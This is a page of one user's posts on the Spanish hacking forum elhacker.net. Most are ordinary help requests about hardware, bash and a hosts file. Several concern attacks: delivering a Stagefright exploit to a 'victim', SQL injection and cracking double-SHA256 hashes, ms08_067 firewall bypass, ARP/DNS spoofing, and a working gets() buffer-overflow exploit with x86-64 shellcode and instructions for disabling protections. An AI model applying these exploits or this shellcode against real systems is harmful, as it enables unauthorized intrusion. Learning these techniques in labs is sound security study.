elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Temas
Páginas: 1 2 3 4 5 [6] 7
51  Foros Generales / Dudas Generales / Problema - La pantalla se satura con colores y me obliga a reiniciar en: 31 Agosto 2016, 03:20 am
Buenas a todos, el problema que estoy afrontando esta vez es que de repente la pantalla se me tilda con lineas horizontales de distintos colores, aqui una foto:



Me pasa siempre, no la puedo usar ni 10 minutos que me vuelve a suceder... Una vez se me colgo con esa pantalla, otra vez con lineas mas verdes, motra con franjas azules....

A veces cuando intento encenderla, el CPU no hace el sonido clásico para indicar que todo anda correctamente, y directamente no veo nada en pantalla, todo negro, ni el cartel de la BIOS... Otras veces cuando la intento encender se me cuelga con la pantalla de windows antes de llegar a la pantalla celeste que dice Iniciando...

Alguna información:
-Windows 7 SP1
-AMD 64 bits, quad core
-6gb RAM DDR3
-La tengo hace mas de 4 años sin formatear
-EL cooler suele hacer mucho ruido cuando arranca, le tengo que dar un golpecito para que deje de hacer ruido
-EL procesador puede llegar a estar sucio, hace mucho que no lo limpio.
-Todo ésto me empezo a pasar ahora, no es un problema que tenga desde antes, y realmente no puedo hacer nada mientras las cosas sigan asi.

Me gustarìa que me dijeran de que se puede llegar a tratar, si puede llegar a ser un problema de hardware, alguna especie de malware o cualquier otra cosa...

Gracias desde ya. Saludos
52  Comunicaciones / Android / Stagefright - Enviar MMS de 2mb gratis a Argentina? en: 9 Agosto 2016, 03:48 am
Muy buenas a todos, estuve leyendo sobre el conocido bug stagefright de android, me bajé la aplicación de ESET para verificar si mi movil es vulnerable y lo es. Quería saber si había algún modo de enviar el mp4 que me genera el python (de 2mb) gratis a mi celular por MMS...

Otra duda que tengo, ya que estamos, la única forma de que ésta vulnereabilidad sea explotable es enviándolo a través de MMS? No se puede enviar por Whatsapp y que la víctima abra el mp4 manualmenete? También probé subiendo el archivo a mi teléfono y abriendolo con un reproductor pero me sale un cartel de error diciéndome que es imposible abrirlo y no se me conecta al listener de netcat...

Saludos y gracias desde ya!
53  Seguridad Informática / Criptografía / Crackear password cifrado dos veces con sha256 con john en: 3 Agosto 2016, 09:50 am
que tal comunidad? estaba haciendo pentesting con la web de un amigo que resultó vulnerable a SQLi, pero los passwords estaban bien cifrados, me dijo que los paso dos veces por sha256... supongo que uso algo como ésto en su código:

Código:
sha256(sha256($pass))

Por ejemplo, usemos el password: juan87

Si lo ciframos una vez por sha256 queda: 

9a9b826753261a7f06364c25ba3f09c0b7f8fc926d6dc494aa9e2e614a64050d

Y si a éste último hash lo volvemos a cifrar con sha256 quedaría:

a5dbc50c08e468b83c5c9bf2f191091e2e3d3858bc6146ed611597a1d8893d71


Probé usar el JTR con los siguientes parámetros:

Código:
john hash.txt --wordlist=passwords.txt --format=Raw-SHA256 --salts=2

siendo hash.txt un archivo que contiene el útlimo hash
(a5dbc50c08e468b83c5c9bf2f191091e2e3d3858bc6146ed611597a1d8893d71)

y el wordlist.txt un archivo con varios passwords, entre ellos juan87 pero no funcionó...

Después intente usar éste comando:

Código:
john hash.txt --wordlist=passwords.txt --format=Raw-SHA256

(sin el --salt=2), y dentro del wordlist dejé el primero de los hashes (9a9b826753261a7f06364c25ba3f09c0b7f8fc926d6dc494aa9e2e614a64050d)

y tampoco lo identificó como la clave... Ésto último me pareció muy raro, ya que al primer hash solo bastaba pasarlo una vez por sha256 para que coincida con el segundo hash, y aun asi tampoco lo identificó...

Gracias por la colaboración!!!!


54  Seguridad Informática / Bugs y Exploits / ms08_067_netapi sobre internet? Se puede bypassear el firewall? en: 11 Julio 2016, 10:32 am
Que tal gente, despues de un tiempo largo volví a probar éste famoso exploit pero ésta vez usando mi ip pública y haciendo  forwarding de lo que le llega a mi router al puerto 445 hacia el puerto 445 de un Windows XP dentro de mi red. Cuando probé el exploit me salto el error de

Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out

Despues toqueteando un poco, probé desactivar el firewall del Windows XP, y ahí si funcionó el exploit... Se ve que era eso, por defecto el puerto 445 solo acepta peticiones de hosts dentro de la subred... No tienen idea si existe alguna forma de esquivar o agregar excepciones al firewall cuando se usan exploits server side? O el firewall solo se puede bypassear con comandos dentro de un backdoor que ejecute manualmente la víctima?

Gracias por la ayuda
55  Seguridad Informática / Hacking Wireless / Duda WPA Handshake y fuerza bruta en: 11 Julio 2016, 08:44 am
Hola comunidad, tenía entendido que para poder aplicar fuerza bruta sobre WPA primero es necesario capturar el handshake, que incluye el hash de la contraseña... También sabía que para determinar que la contraseña sea la correcta, tiene que ser procesada y coincidir con su respectivo hash... Mi pregunta es, como se procesa? Se pasa por un algoritmo de cifrado? Se le aplica MD5, SHA, o alguno de la familia? Como se sabe que aplicar? Gracias desde ya por la ayuda. Saludos
56  Seguridad Informática / Seguridad / Dudas sobre protocolo DNS y DNS Spoofing en: 16 Enero 2016, 02:46 am
Buenas! Quería saber si estoy en lo cierto con ésto... En un ataque MITM, (llevado a cabo gracias al ARP poisoning), la PC atacante es la que realiza la consulta DNS. Es decir, si yo PC atacante me pongo entre medio de una PC victima y el router, y la PC víctima googlea www.facebook.com, yo sería el que tiene que hacer la consulta DNS para obtener la IP de facebook y recién luego de ésto hacer la petición al sitio web... Entonces hacer DNS spoofing sería simplemente no realizar la consulta y utilizar una IP que tenga en una lista de algún archivo... Cuando abrimos Ettercap y activamos el pluggin DNS spoof, lo que estamos haciendo es configurar al Ettercap para que no realice la consulta DNS y en cambio que lea el archivo etter.conf? Estoy en lo cierto en lo que digo? Otra duda ya que estamos, cuando nos conectamos  través de TOR la consulta DNS la realizamos nosotros, o sea que en los logs del servidor DNS va a figurar nuestra IP verdadera, recién luego de la consulta se empieza a conectar con los distintos nodos de la red TOR... Si estoy equivocado en algo o quieren aportar algo sobre el asunto sería muy agradecido! Quiero saber si entendí las cosas bien. Saludos!
57  Foros Generales / Dudas Generales / No puedo hacer redirecciones con archivo host en: 9 Diciembre 2015, 08:34 am
Hola gente! Que tal? El inconveniente que estoy teniendo es que no puedo redirigir un sitio web a la ip que yo haya asignado dentro del archivo host... Lo tengo asi en este momento:

Código:
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97    rhino.acme.com          # source server
#       38.25.63.10 x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
# 127.0.0.1       localhost
# ::1             localhost

#185.37.227.76 www.youtube.com

104.24.17.24 petardas.com
104.24.17.24 www.petardas.com

La ip 104.24.17.24 es la que se corresponde con www.elhacker.net cuando le hice ping. Probé con muchas otras ips de otros sitios obtenidas con los ping pero ninguna me redirecciona, siempre me termina cargando la pagina original. Lo único que si me permite es bloquearla de ésta forma:

Código:
127.0.0.1	petardas.com

Pero solo puedo redireccionarla a localhost, y no a otro sitio web... Alguna idea?
58  Programación / Scripting / Bash: imprimir columnas alineadas en: 14 Noviembre 2015, 01:49 am
Hola que tal gente? Lo que quería era imprimir 3 valores en una misma linea de forma que queden alineados con la linea de abajo. Por ejemplo, si escribo:

Código:
for valor in 1 2 3; do
      echo "$nombre[valor]          $apellido[valor]           %DN[valor]I"
done;

La salida es:

Juan          Lopez              38192434
Rodrigo              Dominguez                          34372374234
Leonardo               Perez                           20943428323

Y yo quiero:

Juan                  Lopez                          38192434
Rodrigo            Dominguez                  34372374234
Leonardo          Perez                           20943428323

Espero que puedan ayudarme! saludos.
59  Seguridad Informática / Bugs y Exploits / Inconveniente al explotar vulnereabilidades de funciones gets() y scanf()? en: 24 Octubre 2015, 09:05 am
Hola señores!! En ésta oportunidad estuve leyendo éste thread:

https://foro.elhacker.net/programacion_general/programacion_segura_buffer_overflows_by_strcpy-t95901.0.html

Hasta hace unos días solo entendía como explotar vulnereabilidades de la funcion strcpy(), y ahora estaba aprendiendo a vulnerar otras funciones, otros casos. Es todo muy similar. Para vulnerar el strcat() por ejemplo hay que tener en cuenta la primera parte del string que se concatena con la segunda parte. Si sabemos la dirección de memoria donde se almacena el string, tenemos que sumar el desplazamiento de la primera parte de la cadena digamos, para usar como dirección de retorno.

Por ejemplo, si tenemos éste código:

Código
  1. char buffer[64]="AAAA";
  2. strcat(buffer, argv[1]);

Supongamos hipotéticamente que la dirección de memoria en la que se almacena buffer es 0x00000000. Entonces la dirección de retorno no puede ser 0x00000000, debería ser 0x00000004, ya que sumamos los 4 bytes de desplazamiento de las "A", porque en el código despues de concatenar vamos a tener "AAAAshellcode", y la shellcode empieza recién en 0x00000004.

Bueno, hasta aca todo genial, mi problema es cuando intento vulnerar casos usando gets() o scanf().

En primer lugar, cabe aclarar que todos los ejemplos los uso con ASLR desactivado:
echo 0 > /proc/sys/kernel/randomize_va_space

Les dejo un ejemplo de programa vulnerable:

Código
  1. /* Ejemplo de bof */
  2. /* gets() peligroso */
  3.  
  4. #include <stdio.h>
  5. int main() {
  6.    char buffer[64];
  7.    printf("%p\n\n",buffer);
  8.    gets(buffer); /* Otra ves una funcion peligros */
  9. }

(era la que estaba en el link que mandé)

Compilado de la siguiente forma:

gcc -fno-stack-protector -z execstack -o gets gets.c


Bueno, para explotarla, hice éste exploit: (la shellcode es para ejecutar /bin/dash)

Código
  1. #include <iostream>
  2. #include <fstream>
  3. using namespace std;
  4.  
  5. int main() {
  6.  
  7.    char ret[] = "\x40\xe3\xff\xff\xff\x7f";
  8.  
  9.    //29 bytes shellcode
  10.    char shellcode[] = "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05";
  11.  
  12.    //71 bytes nops - 29 shellcode = 43 nops
  13.    char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  14.                  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  15.                  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  16.                  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  17.                  "\x90\x90\x90";
  18.  
  19.    cout << "Creando exploit\n\n";
  20.    ofstream fichero;
  21.    fichero.open("archivo.txt");
  22.    fichero << shellcode << nops << ret ;
  23.    fichero.close();
  24.    cout << "ya esta!!!\n\n";
  25.    return 0;
  26.  
  27. }

Lo compilo:
g++ -o exploit exploit.cpp

Lo ejecuto:
./exploit

Abro el programa vulnerable con gdb:
gdb gets

Lo corro enviándole el archivo generado por el exploit:
run < archivo.txt

Y obtengo ésta salida:

process 6070 is executing new program: /bin/dash
[Inferior 1 (process 6070) exited normally]
(gdb)

Es decir, RIP se sobreescribió, la shellcode se ejecutó correctamente pero ni bien se ejecuta se cierra digamos, no puedo hacer nada, en ningun momento puedo usar la consola. Probando fuera de gdb, no me da ninguna salida, supongo que pasa lo mismo, se ejecuta y se cierra inmediatamente de forma que no puedo tomar provecho con ésta shellcode... Despues probé con una shellcode para hacer: cat /etc/passwd, y se ejecuta perfectamente tanto dentro como fuera de gdb, se muestra por consola dicho archivo.... Intentando explotar la función scanf() tuvé exactamente el mismo problema que con gets()...

Ahora la pregunta mia es, como puedo hacer para ejecutar y poder usar una terminal sin que se cierre? Tal como lo hice cuando exploté strcpy(), strcat(), etc...  Tal vez no haya que usar un archivo, sino mandar la shellcode cuando las funciones esperan que ingreses el string, pero como hago para meter una shellcode hexadecimal de esa forma?  

Desde ya muchas gracias por ayudar! Saludos.
60  Seguridad Informática / Bugs y Exploits / Utilidad de explotar vulnereabilidades de Stack Overflow en Windows? en: 10 Octubre 2015, 20:36 pm
Hola informaticos! Estoy un poco cerrado de imaginación por eso recurro a ustedes para que me abran un poco la cabeza... Yo tenía entendido que una utilidad fundamental del Buffer Overflow en Linux era la de conseguir una shell de root si el programa a atacar tiene el flag de suid activado... En Windows me parece que no existe éste mecanismo, entonces por más que consiga invocar a una consola dentro del programa vulnerado, si estoy atancando sin permisos, la consola tampoco tendrá permisos.... Entonces me gustaría que me abran un poco la cabeza, denme algunas ideas de cosas utiies que puedo hacer en Windows explotando éstas vulnereabilidades, y algunas otras ideas para Linux si quieren y pueden. Saludos y gracias desde ya por visitar éste hilo y aportar!
Páginas: 1 2 3 4 5 [6] 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines